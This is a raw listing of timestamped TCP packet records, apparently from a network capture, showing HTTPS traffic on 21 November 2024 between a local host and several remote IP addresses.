                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755955935 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755968094 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776802063 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776824951 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776880026 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776897907 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776911974 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776952028 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795841932 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795860052 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795912981 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795922995 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795937061 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.796060085 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812180042 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812186956 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812267065 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812277079 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812320948 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.834516048 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.834600925 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.834997892 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.836199045 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.836220026 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.878813028 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.880424976 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.880599976 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.881372929 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.881387949 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.918488979 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.918523073 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.918567896 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.918589115 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.918617010 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.918632984 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.929766893 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.929794073 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.929882050 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.929902077 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.929943085 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.940860987 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.940884113 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.940968990 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.940993071 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.941014051 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.941034079 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.949985981 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.950011015 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.950098991 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.950114965 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.950150967 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.950166941 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.959781885 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.959810019 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.959872007 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.959889889 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.959902048 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.959954977 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.969079018 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.969103098 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.969139099 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.969197989 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.969203949 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.969280958 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.979264021 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.979285955 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.979350090 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.979365110 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.979387999 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.979403973 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.989192963 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.989216089 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.989269018 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.989283085 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.989336014 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.122530937 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.122564077 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.122617960 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.122638941 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.122651100 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.122675896 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.129576921 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.129596949 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.129647970 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.129656076 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.129690886 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.129705906 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.137927055 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.137945890 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.137984037 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.137993097 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.138022900 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.138034105 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.145695925 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.145724058 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.145773888 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.145781994 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.145832062 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.145832062 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.152781010 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.152805090 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.152865887 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.152875900 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.152911901 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.152931929 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.161503077 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.161521912 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.161587954 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.161601067 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.161639929 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.168374062 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.168386936 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.168442965 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.168456078 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.168497086 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.176548958 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.176569939 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.176611900 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.176620007 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.176652908 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.176672935 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.300544024 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.300960064 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.300973892 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.301357031 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.301893950 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.301955938 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.302066088 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323522091 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323544025 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323621035 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323641062 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323664904 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323682070 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330636978 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330653906 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330717087 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330725908 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330771923 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338704109 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338731050 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338795900 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338803053 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338818073 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.341351986 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.343333960 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346635103 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346653938 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346719027 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346725941 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346767902 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.350150108 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.350574970 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.350600958 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.351840019 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.351896048 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.351922989 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352190971 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352411985 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352482080 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352852106 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352895021 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352943897 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352957010 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353024960 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353241920 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353254080 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353838921 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353851080 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354074001 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354280949 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354435921 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354486942 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354526043 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354556084 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354737997 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354757071 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354804039 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354813099 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354839087 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354856968 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355128050 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355189085 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355437994 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355530024 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.355556011 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.356682062 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.356767893 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357006073 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357013941 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357433081 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357455969 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357528925 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.357544899 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.363044024 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.363059998 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.363128901 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.363136053 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.363174915 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.370392084 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.370415926 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.370486975 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.370496988 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.370531082 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.377479076 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.377500057 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.377552986 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.377563000 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.377593994 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.401329041 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.401346922 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.401386976 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.401529074 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.407962084 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.408329964 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.408337116 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.408668041 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.409060955 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.409120083 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.409332037 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.451328993 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.525177956 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.525202990 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.525268078 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.525279045 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.525316954 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532829046 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532850981 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532912970 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532918930 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532932043 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532969952 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532974958 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.532998085 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.533026934 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.533067942 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.533341885 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.533350945 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811006069 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811033964 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811088085 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811175108 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811194897 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811554909 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811628103 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.811672926 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.817164898 CET49826443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.817198038 CET4434982613.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.817255974 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.817296982 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.817367077 CET49826443192.168.2.813.107.246.40
